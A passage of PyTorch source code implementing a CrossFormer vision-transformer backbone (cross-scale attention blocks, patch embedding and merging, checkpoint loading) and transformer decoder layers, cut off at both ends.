else:\n pos = self.pos3(self.pos2(self.pos1(self.pos_proj(biases))))\n return pos\n\n def flops(self, N):\n flops = N * 2 * self.pos_dim\n flops += N * self.pos_dim * self.pos_dim\n flops += N * self.pos_dim * self.pos_dim\n flops += N * self.pos_dim * self.num_heads\n return flops\n\nclass Attention(nn.Module):\n r\"\"\" Multi-head self attention module with relative position bias.\n Args:\n dim (int): Number of input channels.\n num_heads (int): Number of attention heads.\n qkv_bias (bool, optional): If True, add a learnable bias to query, key, value. Default: True\n qk_scale (float | None, optional): Override default qk scale of head_dim ** -0.5 if set\n attn_drop (float, optional): Dropout ratio of attention weight. Default: 0.0\n proj_drop (float, optional): Dropout ratio of output. 
Default: 0.0\n \"\"\"\n\n def __init__(self, dim, num_heads, qkv_bias=True, qk_scale=None, attn_drop=0., proj_drop=0.,\n position_bias=True):\n\n super().__init__()\n self.dim = dim\n self.num_heads = num_heads\n head_dim = dim // num_heads\n self.scale = qk_scale or head_dim ** -0.5\n self.position_bias = position_bias\n if self.position_bias:\n self.pos = DynamicPosBias(self.dim // 4, self.num_heads, residual=False)\n\n self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias)\n self.attn_drop = nn.Dropout(attn_drop)\n self.proj = nn.Linear(dim, dim)\n self.proj_drop = nn.Dropout(proj_drop)\n\n self.softmax = nn.Softmax(dim=-1)\n\n def forward(self, x, H, W, mask=None):\n \"\"\"\n Args:\n x: input features with shape of (num_windows*B, N, C)\n mask: (0/-inf) mask with shape of (num_windows, Gh*Gw, Gh*Gw) or None\n \"\"\"\n group_size = (H, W)\n B_, N, C = x.shape\n assert H*W == N\n qkv = self.qkv(x).reshape(B_, N, 3, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4).contiguous()\n q, k, v = qkv[0], qkv[1], qkv[2] # make torchscript happy (cannot use tensor as tuple)\n\n q = q * self.scale\n attn = (q @ k.transpose(-2, -1)) # (num_windows*B, N, N), N = Gh*Gw\n\n if self.position_bias:\n # generate mother-set\n position_bias_h = torch.arange(1 - group_size[0], group_size[0], device=attn.device)\n position_bias_w = torch.arange(1 - group_size[1], group_size[1], device=attn.device)\n biases = torch.stack(torch.meshgrid([position_bias_h, position_bias_w])) # 2, 2Gh-1, 2W2-1\n biases = biases.flatten(1).transpose(0, 1).contiguous().float()\n\n # get pair-wise relative position index for each token inside the window\n coords_h = torch.arange(group_size[0], device=attn.device)\n coords_w = torch.arange(group_size[1], device=attn.device)\n coords = torch.stack(torch.meshgrid([coords_h, coords_w])) # 2, Gh, Gw\n coords_flatten = torch.flatten(coords, 1) # 2, Gh*Gw\n relative_coords = coords_flatten[:, :, None] - coords_flatten[:, None, :] # 2, Gh*Gw, Gh*Gw\n relative_coords = relative_coords.permute(1, 2, 0).contiguous() # Gh*Gw, Gh*Gw, 2\n relative_coords[:, :, 0] += group_size[0] - 1 # shift to start from 0\n relative_coords[:, :, 1] += group_size[1] - 1\n relative_coords[:, :, 0] *= 2 * group_size[1] - 1\n relative_position_index = relative_coords.sum(-1) # Gh*Gw, Gh*Gw\n\n pos = self.pos(biases) # 2Gh-1 * 2Gw-1, heads\n # select position bias\n relative_position_bias = pos[relative_position_index.view(-1)].view( \n group_size[0] * group_size[1], group_size[0] * group_size[1], -1) # Gh*Gw,Gh*Gw,nH\n relative_position_bias = relative_position_bias.permute(2, 0, 1).contiguous() # nH, Gh*Gw, Gh*Gw\n attn = attn + relative_position_bias.unsqueeze(0)\n\n if mask is not None:\n nG = mask.shape[0]\n attn = attn.view(B_ // nG, nG, self.num_heads, N, N) + mask.unsqueeze(1).unsqueeze(0) # (B, nG, nHead, N, N)\n attn = attn.view(-1, self.num_heads, N, N)\n attn = self.softmax(attn)\n else:\n attn = self.softmax(attn)\n\n attn = self.attn_drop(attn)\n\n x = (attn @ v).transpose(1, 2).reshape(B_, N, C)\n x = self.proj(x)\n x = self.proj_drop(x)\n return x\n\n def extra_repr(self) -> str:\n return f'dim={self.dim}, num_heads={self.num_heads}'\n\n def flops(self, N):\n # calculate flops for 1 window with token length of N\n flops = 0\n excluded_flops = 0\n # qkv = self.qkv(x)\n flops += N * self.dim * 3 * self.dim\n # attn = (q @ k.transpose(-2, -1))\n flops += self.num_heads * N * (self.dim // self.num_heads) * N\n excluded_flops += self.num_heads * N * (self.dim // self.num_heads) * N\n # x = (attn @ 
v)\n flops += self.num_heads * N * N * (self.dim // self.num_heads)\n excluded_flops += self.num_heads * N * N * (self.dim // self.num_heads)\n # x = self.proj(x)\n flops += N * self.dim * self.dim\n if self.position_bias:\n flops += self.pos.flops(N)\n return flops, excluded_flops\n\nclass CrossFormerBlock(nn.Module):\n r\"\"\" CrossFormer Block.\n Args:\n dim (int): Number of input channels.\n input_resolution (tuple[int]): Input resolution.\n num_heads (int): Number of attention heads.\n group_size (int): Group size.\n lsda_flag (int): use SDA or LDA, 0 for SDA and 1 for LDA.\n mlp_ratio (float): Ratio of mlp hidden dim to embedding dim.\n qkv_bias (bool, optional): If True, add a learnable bias to query, key, value. Default: True\n qk_scale (float | None, optional): Override default qk scale of head_dim ** -0.5 if set.\n drop (float, optional): Dropout rate. Default: 0.0\n attn_drop (float, optional): Attention dropout rate. Default: 0.0\n drop_path (float, optional): Stochastic depth rate. Default: 0.0\n act_layer (nn.Module, optional): Activation layer. Default: nn.GELU\n norm_layer (nn.Module, optional): Normalization layer. Default: nn.LayerNorm\n \"\"\"\n\n def __init__(self, dim, input_resolution, num_heads, group_size=7, interval=8, lsda_flag=0,\n mlp_ratio=4., qkv_bias=True, qk_scale=None, drop=0., attn_drop=0., drop_path=0.,\n act_layer=nn.GELU, norm_layer=nn.LayerNorm, num_patch_size=1):\n super().__init__()\n self.dim = dim\n self.input_resolution = input_resolution\n self.num_heads = num_heads\n self.group_size = group_size\n self.interval = interval\n self.lsda_flag = lsda_flag\n self.mlp_ratio = mlp_ratio\n self.num_patch_size = num_patch_size\n\n self.norm1 = norm_layer(dim)\n\n self.attn = Attention(\n dim, num_heads=num_heads,\n qkv_bias=qkv_bias, qk_scale=qk_scale, attn_drop=attn_drop, proj_drop=drop,\n position_bias=True)\n\n self.drop_path = DropPath(drop_path) if drop_path > 0. 
else nn.Identity()\n self.norm2 = norm_layer(dim)\n mlp_hidden_dim = int(dim * mlp_ratio)\n self.mlp = Mlp(in_features=dim, hidden_features=mlp_hidden_dim, act_layer=act_layer, drop=drop)\n\n def forward(self, x, H, W):\n B, L, C = x.shape\n assert L == H * W, \"input feature has wrong size %d, %d, %d\" % (L, H, W)\n\n if min(H, W) <= self.group_size:\n # if window size is larger than input resolution, we don't partition windows\n self.lsda_flag = 0\n self.group_size = min(H, W)\n\n shortcut = x\n x = self.norm1(x)\n x = x.view(B, H, W, C)\n\n # padding\n size_div = self.interval if self.lsda_flag == 1 else self.group_size\n pad_l = pad_t = 0\n pad_r = (size_div - W % size_div) % size_div\n pad_b = (size_div - H % size_div) % size_div\n x = F.pad(x, (0, 0, pad_l, pad_r, pad_t, pad_b))\n _, Hp, Wp, _ = x.shape\n\n mask = torch.zeros((1, Hp, Wp, 1), device=x.device)\n if pad_b > 0:\n mask[:, -pad_b:, :, :] = -1\n if pad_r > 0:\n mask[:, :, -pad_r:, :] = -1\n\n # group embeddings and generate attn_mask\n if self.lsda_flag == 0: # SDA\n G = Gh = Gw = self.group_size\n x = x.reshape(B, Hp // G, G, Wp // G, G, C).permute(0, 1, 3, 2, 4, 5).contiguous()\n x = x.reshape(B * Hp * Wp // G**2, G**2, C)\n nG = Hp * Wp // G**2\n # attn_mask\n if pad_r > 0 or pad_b > 0:\n mask = mask.reshape(1, Hp // G, G, Wp // G, G, 1).permute(0, 1, 3, 2, 4, 5).contiguous()\n mask = mask.reshape(nG, 1, G * G)\n attn_mask = torch.zeros((nG, G * G, G * G), device=x.device)\n attn_mask = attn_mask.masked_fill(mask < 0, NEG_INF)\n else:\n attn_mask = None\n else: # LDA\n I, Gh, Gw = self.interval, Hp // self.interval, Wp // self.interval\n x = x.reshape(B, Gh, I, Gw, I, C).permute(0, 2, 4, 1, 3, 5).contiguous()\n x = x.reshape(B * I * I, Gh * Gw, C)\n nG = I ** 2\n # attn_mask\n if pad_r > 0 or pad_b > 0:\n mask = mask.reshape(1, Gh, I, Gw, I, 1).permute(0, 2, 4, 1, 3, 5).contiguous()\n mask = mask.reshape(nG, 1, Gh * Gw)\n attn_mask = torch.zeros((nG, Gh * Gw, Gh * Gw), device=x.device)\n attn_mask = attn_mask.masked_fill(mask < 0, NEG_INF)\n else:\n attn_mask = None\n\n # multi-head self-attention\n x = self.attn(x, Gh, Gw, mask=attn_mask) # nG*B, G*G, C\n \n # ungroup embeddings\n if self.lsda_flag == 0:\n x = x.reshape(B, Hp // G, Wp // G, G, G, C).permute(0, 1, 3, 2, 4, 5).contiguous() # B, Hp//G, G, Wp//G, G, C\n else:\n x = x.reshape(B, I, I, Gh, Gw, C).permute(0, 3, 1, 4, 2, 5).contiguous() # B, Gh, I, Gw, I, C\n x = x.reshape(B, Hp, Wp, C)\n\n # remove padding\n if pad_r > 0 or pad_b > 0:\n x = x[:, :H, :W, :].contiguous()\n x = x.view(B, H * W, C)\n\n # FFN\n x = shortcut + self.drop_path(x)\n x = x + self.drop_path(self.mlp(self.norm2(x)))\n\n return x\n\n def extra_repr(self) -> str:\n return f\"dim={self.dim}, input_resolution={self.input_resolution}, num_heads={self.num_heads}, \" \\\n f\"group_size={self.group_size}, lsda_flag={self.lsda_flag}, mlp_ratio={self.mlp_ratio}\"\n\n def flops(self):\n flops = 0\n H, W = self.input_resolution\n # norm1\n flops += self.dim * H * W\n # Attention\n size_div = self.interval if self.lsda_flag == 1 else self.group_size\n Hp = math.ceil(H / size_div) * size_div\n Wp = math.ceil(W / size_div) * size_div\n Gh = Hp / size_div if self.lsda_flag == 1 else self.group_size\n Gw = Wp / size_div if self.lsda_flag == 1 else self.group_size\n nG = Hp * Wp / Gh / Gw\n attn_flops, attn_excluded_flops = self.attn.flops(Gh * Gw)\n flops += nG * attn_flops\n excluded_flops = nG * attn_excluded_flops\n # mlp\n flops += 2 * H * W * self.dim * self.dim * self.mlp_ratio\n # norm2\n flops += 
self.dim * H * W\n return flops, excluded_flops\n\nclass PatchMerging(nn.Module):\n r\"\"\" Patch Merging Layer.\n Args:\n input_resolution (tuple[int]): Resolution of input feature.\n dim (int): Number of input channels.\n norm_layer (nn.Module, optional): Normalization layer. Default: nn.LayerNorm\n \"\"\"\n\n def __init__(self, input_resolution, dim, norm_layer=nn.LayerNorm, patch_size=[2], num_input_patch_size=1):\n super().__init__()\n self.input_resolution = input_resolution\n self.dim = dim\n self.reductions = nn.ModuleList()\n self.patch_size = patch_size\n self.norm = norm_layer(dim)\n\n for i, ps in enumerate(patch_size):\n if i == len(patch_size) - 1:\n out_dim = 2 * dim // 2 ** i\n else:\n out_dim = 2 * dim // 2 ** (i + 1)\n stride = 2\n padding = (ps - stride) // 2\n self.reductions.append(nn.Conv2d(dim, out_dim, kernel_size=ps, \n stride=stride, padding=padding))\n\n def forward(self, x, H, W):\n \"\"\"\n x: B, H*W, C\n \"\"\"\n B, L, C = x.shape\n assert L == H * W, \"input feature has wrong size\"\n assert H % 2 == 0 and W % 2 == 0, f\"x size ({H}*{W}) is not even.\"\n\n x = self.norm(x)\n x = x.view(B, H, W, C).permute(0, 3, 1, 2).contiguous()\n\n xs = []\n for i in range(len(self.reductions)):\n tmp_x = self.reductions[i](x).flatten(2).transpose(1, 2).contiguous()\n xs.append(tmp_x)\n x = torch.cat(xs, dim=2)\n return x\n\n def extra_repr(self) -> str:\n return f\"input_resolution={self.input_resolution}, dim={self.dim}\"\n\n def flops(self):\n H, W = self.input_resolution\n flops = H * W * self.dim\n for i, ps in enumerate(self.patch_size):\n if i == len(self.patch_size) - 1:\n out_dim = 2 * self.dim // 2 ** i\n else:\n out_dim = 2 * self.dim // 2 ** (i + 1)\n flops += (H // 2) * (W // 2) * ps * ps * out_dim * self.dim\n return flops\n\nclass Stage(nn.Module):\n \"\"\" CrossFormer blocks for one stage.\n Args:\n dim (int): Number of input channels.\n input_resolution (tuple[int]): Input resolution.\n depth (int): Number of blocks.\n num_heads (int): Number of attention heads.\n group_size (int): Group size.\n mlp_ratio (float): Ratio of mlp hidden dim to embedding dim.\n qkv_bias (bool, optional): If True, add a learnable bias to query, key, value. Default: True\n qk_scale (float | None, optional): Override default qk scale of head_dim ** -0.5 if set.\n drop (float, optional): Dropout rate. Default: 0.0\n attn_drop (float, optional): Attention dropout rate. Default: 0.0\n drop_path (float | tuple[float], optional): Stochastic depth rate. Default: 0.0\n norm_layer (nn.Module, optional): Normalization layer. Default: nn.LayerNorm\n downsample (nn.Module | None, optional): Downsample layer at the end of the layer. Default: None\n use_checkpoint (bool): Whether to use checkpointing to save memory. 
Default: False.\n \"\"\"\n\n def __init__(self, dim, input_resolution, depth, num_heads, group_size, interval,\n mlp_ratio=4., qkv_bias=True, qk_scale=None, drop=0., attn_drop=0.,\n drop_path=0., norm_layer=nn.LayerNorm, downsample=None, use_checkpoint=False,\n patch_size_end=[4], num_patch_size=None):\n\n super().__init__()\n self.dim = dim\n self.depth = depth\n self.use_checkpoint = use_checkpoint\n\n # build blocks\n self.blocks = nn.ModuleList()\n for i in range(depth):\n lsda_flag = 0 if (i % 2 == 0) else 1\n self.blocks.append(CrossFormerBlock(dim=dim, input_resolution=input_resolution,\n num_heads=num_heads, group_size=group_size, interval=interval,\n lsda_flag=lsda_flag,\n mlp_ratio=mlp_ratio,\n qkv_bias=qkv_bias, qk_scale=qk_scale,\n drop=drop, attn_drop=attn_drop,\n drop_path=drop_path[i] if isinstance(drop_path, list) else drop_path,\n norm_layer=norm_layer,\n num_patch_size=num_patch_size))\n\n # patch merging layer\n if downsample is not None:\n self.downsample = downsample(input_resolution, dim=dim, norm_layer=norm_layer, \n patch_size=patch_size_end, num_input_patch_size=num_patch_size)\n else:\n self.downsample = None\n\n def forward(self, x, H, W):\n for blk in self.blocks:\n if self.use_checkpoint:\n # pass H and W through as well; the block signature is blk(x, H, W)\n x = checkpoint.checkpoint(blk, x, H, W)\n else:\n x = blk(x, H, W)\n\n B, _, C = x.shape\n feat = x.view(B, H, W, C).permute(0, 3, 1, 2).contiguous()\n if self.downsample is not None:\n x = self.downsample(x, H, W)\n return feat, x\n\n def extra_repr(self) -> str:\n return f\"dim={self.dim}, depth={self.depth}\"\n\n def flops(self):\n flops = 0\n excluded_flops = 0\n for blk in self.blocks:\n blk_flops, blk_excluded_flops = blk.flops()\n flops += blk_flops\n excluded_flops += blk_excluded_flops\n if self.downsample is not None:\n flops += self.downsample.flops()\n return flops, excluded_flops\n\nclass PatchEmbed(nn.Module):\n r\"\"\" Image to Patch Embedding\n Args:\n img_size (int): Image size. Default: 224.\n patch_size (int): Patch token size. Default: 4.\n in_chans (int): Number of input image channels. Default: 3.\n embed_dim (int): Number of linear projection output channels. Default: 96.\n norm_layer (nn.Module, optional): Normalization layer. 
Default: None\n \"\"\"\n\n def __init__(self, img_size=224, patch_size=[4], in_chans=3, embed_dim=96, norm_layer=None):\n super().__init__()\n img_size = to_2tuple(img_size)\n # patch_size = to_2tuple(patch_size)\n patches_resolution = [img_size[0] // 4, img_size[1] // 4] # only for flops calculation\n self.img_size = img_size\n self.patch_size = patch_size\n self.patches_resolution = patches_resolution\n\n self.in_chans = in_chans\n self.embed_dim = embed_dim\n\n self.projs = nn.ModuleList()\n for i, ps in enumerate(patch_size):\n if i == len(patch_size) - 1:\n dim = embed_dim // 2 ** i\n else:\n dim = embed_dim // 2 ** (i + 1)\n stride = 4\n padding = (ps - 4) // 2\n self.projs.append(nn.Conv2d(in_chans, dim, kernel_size=ps, stride=stride, padding=padding))\n if norm_layer is not None:\n self.norm = norm_layer(embed_dim)\n else:\n self.norm = None\n\n def forward(self, x):\n B, C, H, W = x.shape\n xs = []\n for i in range(len(self.projs)):\n tx = self.projs[i](x).flatten(2).transpose(1, 2)\n xs.append(tx) # B Ph*Pw C\n x = torch.cat(xs, dim=2)\n if self.norm is not None:\n x = self.norm(x)\n return x, H, W\n\n def flops(self):\n Ho, Wo = self.patches_resolution\n flops = 0\n for i, ps in enumerate(self.patch_size):\n if i == len(self.patch_size) - 1:\n dim = self.embed_dim // 2 ** i\n else:\n dim = self.embed_dim // 2 ** (i + 1)\n flops += Ho * Wo * dim * self.in_chans * (self.patch_size[i] * self.patch_size[i])\n if self.norm is not None:\n flops += Ho * Wo * self.embed_dim\n return flops\n\nclass CrossFormer(nn.Module):\n r\"\"\" CrossFormer\n A PyTorch impl of : `CrossFormer: A Versatile Vision Transformer Based on Cross-scale Attention` -\n Args:\n img_size (int | tuple(int)): Input image size. Default 224\n patch_size (int | tuple(int)): Patch size. Default: 4\n in_chans (int): Number of input image channels. Default: 3\n num_classes (int): Number of classes for classification head. Default: 1000\n embed_dim (int): Patch embedding dimension. Default: 96\n depths (tuple(int)): Depth of each stage.\n num_heads (tuple(int)): Number of attention heads in different layers.\n group_size (int): Group size. Default: 7\n mlp_ratio (float): Ratio of mlp hidden dim to embedding dim. Default: 4\n qkv_bias (bool): If True, add a learnable bias to query, key, value. Default: True\n qk_scale (float): Override default qk scale of head_dim ** -0.5 if set. Default: None\n drop_rate (float): Dropout rate. Default: 0\n attn_drop_rate (float): Attention dropout rate. Default: 0\n drop_path_rate (float): Stochastic depth rate. Default: 0.1\n norm_layer (nn.Module): Normalization layer. Default: nn.LayerNorm.\n ape (bool): If True, add absolute position embedding to the patch embedding. Default: False\n patch_norm (bool): If True, add normalization after patch embedding. Default: True\n use_checkpoint (bool): Whether to use checkpointing to save memory. 
Default: False\n \"\"\"\n def __init__(self, \n img_size=224, \n patch_size=[4], \n in_chans=3, \n num_classes=1000,\n embed_dim=96, \n depths=[2, 2, 6, 2], \n num_heads=[3, 6, 12, 24],\n group_size=[7, 7, 7, 7], \n crs_interval=[8, 4, 2, 1], \n mlp_ratio=4., \n qkv_bias=True, \n qk_scale=None,\n drop_rate=0., \n attn_drop_rate=0., \n drop_path_rate=0.1,\n norm_layer=nn.LayerNorm, \n patch_norm=True,\n use_checkpoint=False, \n merge_size=[[2], [2], [2]],\n pretrained = None, \n **kwargs):\n super().__init__()\n\n self.num_classes = num_classes\n self.num_layers = len(depths)\n self.embed_dim = embed_dim\n self.patch_norm = patch_norm\n self.num_features = int(embed_dim * 2 ** (self.num_layers - 1))\n self.mlp_ratio = mlp_ratio\n\n # split image into non-overlapping patches\n self.patch_embed = PatchEmbed(\n img_size=img_size, patch_size=patch_size, in_chans=in_chans, embed_dim=embed_dim,\n norm_layer=norm_layer if self.patch_norm else None)\n patches_resolution = self.patch_embed.patches_resolution\n self.patches_resolution = patches_resolution # [H//4, W//4] of original image size\n self.pos_drop = nn.Dropout(p=drop_rate)\n # self.neck = FPN(\n # in_channels = [96,192,384,768],\n # out_channels=256,\n # start_level=1,\n # add_extra_convs='on_input',\n # num_outs=5\n # )\n # stochastic depth\n dpr = [x.item() for x in torch.linspace(0, drop_path_rate, sum(depths))] # stochastic depth decay rule\n\n # build layers\n self.layers = nn.ModuleList()\n\n num_patch_sizes = [len(patch_size)] + [len(m) for m in merge_size]\n for i_layer in range(self.num_layers):\n patch_size_end = merge_size[i_layer] if i_layer < self.num_layers - 1 else None\n num_patch_size = num_patch_sizes[i_layer]\n layer = Stage(dim=int(embed_dim * 2 ** i_layer),\n input_resolution=(patches_resolution[0] // (2 ** i_layer),\n patches_resolution[1] // (2 ** i_layer)),\n depth=depths[i_layer],\n num_heads=num_heads[i_layer],\n group_size=group_size[i_layer],\n interval=crs_interval[i_layer],\n mlp_ratio=self.mlp_ratio,\n qkv_bias=qkv_bias, qk_scale=qk_scale,\n drop=drop_rate, attn_drop=attn_drop_rate,\n drop_path=dpr[sum(depths[:i_layer]):sum(depths[:i_layer + 1])],\n norm_layer=norm_layer,\n downsample=PatchMerging if (i_layer < self.num_layers - 1) else None,\n use_checkpoint=use_checkpoint,\n patch_size_end=patch_size_end,\n num_patch_size=num_patch_size)\n self.layers.append(layer)\n # classification\n # self.norm = norm_layer(self.num_features)\n # self.avgpool = nn.AdaptiveAvgPool1d(1)\n # self.head = nn.Linear(self.num_features, num_classes) if num_classes > 0 else nn.Identity()\n\n self.apply(self._init_weights)\n self.init_weights(pretrained) \n\n def init_weights(self, pretrained=None):\n \"\"\"Initialize the weights in backbone.\n Args:\n pretrained (str, optional): Path to pre-trained weights.\n Defaults to None.\n # Note that `mmcv` has a safe checkpoint_load impl, please refer to the following url\n # load_checkpoint(self, pretrained, map_location='cpu', strict=False, logger=logger) \n # https://github.com/open-mmlab/mmcv/blob/571e3e5fc75c23b45cbd9b00011af094357c5f1d/mmcv/runner/checkpoint.py \n \"\"\"\n def _process_mmcls_checkpoint(checkpoint):\n state_dict = checkpoint['state_dict']\n new_state_dict = OrderedDict()\n for k, v in state_dict.items():\n if k.startswith('backbone.'):\n new_state_dict[k[9:]] = v\n new_checkpoint = dict(state_dict=new_state_dict)\n return new_checkpoint\n\n if isinstance(pretrained, str):\n # self.apply(self._init_weights)\n checkpoint = torch.load(pretrained, map_location='cpu')\n 
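# mmcls-style checkpoints store every backbone weight under a 'backbone.' prefix,\n            # so the raw state_dict will not match this module's parameter names;\n            # _process_mmcls_checkpoint strips the prefix below, after which the\n            # non-strict load reports whatever keys still fail to line up.\n            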
new_checkpoint = _process_mmcls_checkpoint(checkpoint)\n '''\n Key-name mismatch seen when loading an mmcls checkpoint directly:\n the missing keys are bare module names such as 'patch_embed1.proj.weight',\n while the unexpected keys are the same names under a 'backbone.' prefix,\n e.g. 'backbone.patch_embed1.proj.weight'; stripping the prefix above\n makes the two sets line up.\n '''\n # pretrain_dict = new_checkpoint['state_dict']\n # my_model_dict = self.state_dict()\n # pretrain_dict = {k: v for k, v in pretrain_dict.items() if k in my_model_dict}\n # my_model_dict.update(pretrain_dict)\n # self.load_state_dict(my_model_dict)\n # print(f'load from {pretrained}.')\n logger.info(f\"Loading pretrained model from {pretrained}\")\n missing_keys, unexpected_keys = self.load_state_dict(new_checkpoint['state_dict'], strict=False)\n unexpected_keys = [k for k in unexpected_keys if not (k.endswith('total_params') or k.endswith('total_ops'))]\n if len(missing_keys) > 0:\n logger.info('Missing Keys: {}'.format(missing_keys))\n if len(unexpected_keys) > 0:\n logger.info('Unexpected Keys: {}'.format(unexpected_keys))\n elif pretrained is None:\n self.apply(self._init_weights)\n else:\n raise TypeError('pretrained must be a str or None')\n\n def _init_weights(self, m):\n if isinstance(m, nn.Linear):\n trunc_normal_(m.weight, std=.02)\n if isinstance(m, nn.Linear) and m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.LayerNorm):\n nn.init.constant_(m.bias, 0)\n nn.init.constant_(m.weight, 1.0)\n\n @torch.jit.ignore\n def no_weight_decay(self):\n return {'absolute_pos_embed'}\n\n @torch.jit.ignore\n def no_weight_decay_keywords(self):\n return {'relative_position_bias_table'}\n\n def forward(self, x):\n x, H, W = self.patch_embed(x)\n x = self.pos_drop(x)\n outs = []\n for i, layer in enumerate(self.layers):\n feat, x = layer(x, H //4 //(2 ** i), W //4 //(2 ** i))\n outs.append(feat)\n # # classification\n # x = self.norm(x) # B L C\n # x = self.avgpool(x.transpose(1, 2)) # B C 1\n # x = torch.flatten(x, 1)\n # x = self.head(x)\n # return x \n # FPN Neck\n output = outs[-1]\n output = output.flatten(2).transpose(1, 2)\n # torch.Size([3, 1000, 768]) \n output = output.permute(1,0,2)\n # torch.Size([1000, 3, 768])\n # outputs = self.neck(outs)\n # src_flatten = []\n # for src in outputs:\n # src = src.flatten(2).transpose(1, 2)\n # src_flatten.append(src)\n # src_flatten = torch.cat(src_flatten, 1)\n # src_flatten = src_flatten.permute(1,0,2)\n return output\n\n def flops(self):\n flops = 0\n excluded_flops = 
0\n flops += self.patch_embed.flops()\n for i, layer in enumerate(self.layers):\n layer_flops, layer_excluded_flops = layer.flops()\n flops += layer_flops\n excluded_flops += layer_excluded_flops\n # flops += self.num_features * self.patches_resolution[0] * self.patches_resolution[1] // (2 ** self.num_layers)\n # flops += self.num_features * self.num_classes\n return flops, excluded_flops\n\ndef _get_clones(module, N):\n return nn.ModuleList([copy.deepcopy(module) for i in range(N)])\n\ndef _get_activation_fn(activation):\n \"\"\"Return an activation function given a string\"\"\"\n if activation == \"relu\":\n return F.relu\n if activation == \"gelu\":\n return F.gelu\n if activation == \"glu\":\n return F.glu\n raise RuntimeError(F\"activation should be relu/gelu, not {activation}.\")\n\nclass TransformerDecoder(nn.Module):\n def __init__(self, decoder_layer, num_layers, norm=None, return_intermediate=False):\n super().__init__()\n self.layers = _get_clones(decoder_layer, num_layers)\n self.num_layers = num_layers\n self.norm = norm\n self.return_intermediate = return_intermediate\n\n def forward(self, tgt, memory,\n tgt_mask: Optional[Tensor] = None,\n memory_mask: Optional[Tensor] = None,\n tgt_key_padding_mask: Optional[Tensor] = None,\n memory_key_padding_mask: Optional[Tensor] = None,\n pos: Optional[Tensor] = None,\n query_pos: Optional[Tensor] = None):\n output = tgt\n\n intermediate = []\n\n for layer in self.layers:\n output = layer(output, memory, tgt_mask=tgt_mask,\n memory_mask=memory_mask,\n tgt_key_padding_mask=tgt_key_padding_mask,\n memory_key_padding_mask=memory_key_padding_mask,\n pos=pos, query_pos=query_pos)\n if self.return_intermediate:\n intermediate.append(self.norm(output))\n\n if self.norm is not None:\n output = self.norm(output)\n if self.return_intermediate:\n intermediate.pop()\n intermediate.append(output)\n\n if self.return_intermediate:\n return torch.stack(intermediate)\n \n return output.unsqueeze(0)\n\nclass TransformerDecoderLayer(nn.Module):\n def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1,\n activation=\"relu\", normalize_before=False):\n super().__init__()\n self.self_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout)\n self.multihead_attn = nn.MultiheadAttention(\n d_model, nhead, dropout=dropout)\n # Implementation of feedforward mode\n self.linear1 = nn.Linear(d_model, dim_feedforward)\n self.dropout = nn.Dropout(dropout)\n self.linear2 = nn.Linear(dim_feedforward, d_model)\n\n self.norm1 = nn.LayerNorm(d_model)\n self.norm2 = nn.LayerNorm(d_model)\n self.norm3 = nn.LayerNorm(d_model)\n self.dropout1 = nn.Dropout(dropout)\n self.dropout2 = nn.Dropout(dropout)\n self.dropout3 = nn.Dropout(dropout)\n\n self.activation = _get_activation_fn(activation)\n self.normalize_before = normalize_before\n\n def with_pos_embed(self, tensor, pos: Optional[Tensor]):\n return tensor if pos is None else tensor + pos\n\n def forward_post(self, tgt, memory,\n tgt_mask: Optional[Tensor] = None,\n memory_mask: Optional[Tensor] = None,\n tgt_key_padding_mask: Optional[Tensor] = None,\n memory_key_padding_mask: Optional[Tensor] = None,\n pos: Optional[Tensor] = None,\n query_pos: Optional[Tensor] = None):\n q = k = self.with_pos_embed(tgt, query_pos)\n tgt2 = self.self_attn(q, k, value=tgt, attn_mask=tgt_mask,\n key_padding_mask=tgt_key_padding_mask)[0]\n tgt = tgt + self.dropout1(tgt2)\n tgt = self.norm1(tgt)\n \"\"\"\n - query: :math:`(L, N, E)` where L is the target sequence length, N is the batch size, E is\n the embedding 
dimension.\n \n - key: :math:`(S, N, E)`, where S is the source sequence length, N is the batch size, E is\n the embedding dimension.\n \n - value: :math:`(S, N, E)` where S is the source sequence length, N is the batch size, E is\n the embedding dimension.\n \n - key_padding_mask: :math:`(N, S)`, ByteTensor, where N is the batch size, S is the source sequence length.\n \n - attn_mask: 2D mask :math:`(L, S)` where L is the target sequence length, S is the source sequence length.\n 3D mask :math:`(N*num_heads, L, S)` where N is the batch size, L is the target sequence length,\n S is the source sequence length. \n \"\"\" \n tgt2 = self.multihead_attn(query=self.with_pos_embed(tgt, query_pos),\n key=self.with_pos_embed(memory, pos),\n value=memory, attn_mask=memory_mask,\n key_padding_mask=memory_key_padding_mask)[0]\n tgt = tgt + self.dropout2(tgt2)\n tgt = self.norm2(tgt)\n tgt2 = self.linear2(self.dropout(self.activation(self.linear1(tgt))))\n tgt = tgt + self.dropout3(tgt2)\n tgt = self.norm3(tgt)\n return tgt\n\n def forward_pre(self, tgt, memory,\n tgt_mask: Optional[Tensor] = None,\n memory_mask: Optional[Tensor] = None,\n tgt_key_padding_mask: Optional[Tensor] = None,\n memory_key_padding_mask: Optional[Tensor] = None,\n pos: Optional[Tensor] = None,\n query_pos: Optional[Tensor] = None):\n tgt2 = self.norm1(tgt)\n q = k = self.with_pos_embed(tgt2, query_pos)\n tgt2 = self.self_attn(q, k, value=tgt2, attn_mask=tgt_mask,\n key_padding_mask=tgt_key_padding_mask)[0]\n tgt = tgt + self.dropout1(tgt2)\n tgt2 = self.norm2(tgt)\n tgt2 = self.multihead_attn(query=self.with_pos_embed(tgt2, query_pos),\n key=self.with_pos_embed(memory, pos),\n value=memory, attn_mask=memory_mask,\n key_padding_mask=memory_key_padding_mask)[0]\n tgt = tgt + self.dropout2(tgt2)\n tgt2 = self.norm3(tgt)\n tgt2 = self.linear2(self.dropout(self.activation(self.linear1(tgt2))))\n tgt = tgt + self.dropout3(tgt2)\n return tgt\n\n def forward(self, tgt, memory,\n tgt_mask: Optional[Tensor] = None,\n memory_mask: Optional[Tensor] = None,\n tgt_key_padding_mask: Optional[Tensor] = None,\n memory_key_padding_mask: Optional[Tensor] = None,\n pos: Optional[Tensor] = None,\n query_pos: Optional[Tensor] = None):\n if self.normalize_before:\n return self.forward_pre(tgt, memory, tgt_mask, memory_mask,\n tgt_key_padding_mask, memory_key_padding_mask, pos, query_pos)\n return self.forward_post(tgt, memory, tgt_mask, memory_mask,\n tgt_key_padding_mask, memory_key_padding_mask, pos, query_pos)\n\nclass Transformer(nn.Module):\n def __init__(self,\n 